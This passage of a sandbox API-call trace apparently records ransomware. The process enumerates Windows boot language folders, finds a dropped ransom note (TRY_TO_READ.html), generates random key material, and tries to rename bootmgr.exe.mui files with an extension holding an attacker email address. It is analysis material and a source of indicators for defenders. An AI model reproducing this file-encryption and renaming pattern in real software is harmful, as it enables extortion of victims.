(HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e2d8 | out: hHeap=0x2e0000) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.605] FindNextFileW (in: hFindFile=0x35d898, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.605] GetLastError () returned 0x6 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e2d8 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e2d8 | out: hHeap=0x2e0000) returned 1 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.605] FindNextFileW (in: hFindFile=0x35d898, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.605] GetLastError () returned 0x6 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.605] FindNextFileW (in: hFindFile=0x35d898, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362298 [0116.606] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b38 [0116.606] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362298 | out: pbBuffer=0x362298) returned 1 [0116.606] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b38 | out: pbBuffer=0x330b38) returned 1 [0116.606] SetFileAttributesW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.606] lstrlenW (lpString="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30 [0116.606] GetProcessHeap () returned 0x2e0000 [0116.606] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.606] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" [0116.606] lstrcatW (in: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.606] MoveFileExW (lpExistingFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.606] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.606] GetProcessHeap () returned 0x2e0000 [0116.606] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.606] CloseHandle (hObject=0xffffffff) returned 0 [0116.606] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.606] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.606] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.606] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.606] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e328 | out: hHeap=0x2e0000) returned 1 [0116.606] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e350 | out: hHeap=0x2e0000) returned 1 [0116.606] FindFirstFileW (in: lpFileName="C:\\\\Boot\\hu-HU\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35d8d8 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.607] GetLastError () returned 0x6 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e328 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d918 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d918 | out: hHeap=0x2e0000) returned 1 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e328 | out: hHeap=0x2e0000) returned 1 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.607] FindNextFileW (in: hFindFile=0x35d8d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.607] GetLastError () returned 0x6 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e328 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d918 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d918 | out: hHeap=0x2e0000) returned 1 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e328 | out: hHeap=0x2e0000) returned 1 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.607] FindNextFileW (in: hFindFile=0x35d8d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.607] GetLastError () returned 0x6 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e328 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.607] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.608] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.608] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e328 | out: hHeap=0x2e0000) returned 1 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.608] FindNextFileW (in: hFindFile=0x35d8d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.608] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.608] GetLastError () returned 0x6 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.608] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.608] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.608] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.608] FindNextFileW (in: hFindFile=0x35d8d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3623a0 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b48 [0116.608] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3623a0 | out: pbBuffer=0x3623a0) returned 1 [0116.608] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b48 | out: pbBuffer=0x330b48) returned 1 [0116.608] SetFileAttributesW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.608] lstrlenW (lpString="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30 [0116.608] GetProcessHeap () returned 0x2e0000 [0116.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.608] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" [0116.608] lstrcatW (in: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.608] MoveFileExW (lpExistingFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.608] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.609] GetProcessHeap () returned 0x2e0000 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.609] CloseHandle (hObject=0xffffffff) returned 0 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e378 | out: hHeap=0x2e0000) returned 1 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e3a0 | out: hHeap=0x2e0000) returned 1 [0116.609] FindFirstFileW (in: lpFileName="C:\\\\Boot\\it-IT\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35d918 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.609] GetLastError () returned 0x6 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e378 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d958 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d958 | out: hHeap=0x2e0000) returned 1 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e378 | out: hHeap=0x2e0000) returned 1 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.609] FindNextFileW (in: hFindFile=0x35d918, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.609] GetLastError () returned 0x6 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e378 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d958 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d958 | out: hHeap=0x2e0000) returned 1 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e378 | out: hHeap=0x2e0000) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.610] FindNextFileW (in: hFindFile=0x35d918, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.610] GetLastError () returned 0x6 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e378 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e378 | out: hHeap=0x2e0000) returned 1 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.610] FindNextFileW (in: hFindFile=0x35d918, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.610] GetLastError () returned 0x6 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.610] FindNextFileW (in: hFindFile=0x35d918, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3624a8 [0116.611] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b58 [0116.611] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3624a8 | out: pbBuffer=0x3624a8) returned 1 [0116.611] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b58 | out: pbBuffer=0x330b58) returned 1 [0116.611] SetFileAttributesW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.611] lstrlenW (lpString="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned 30 [0116.611] GetProcessHeap () returned 0x2e0000 [0116.611] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.611] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" | out: 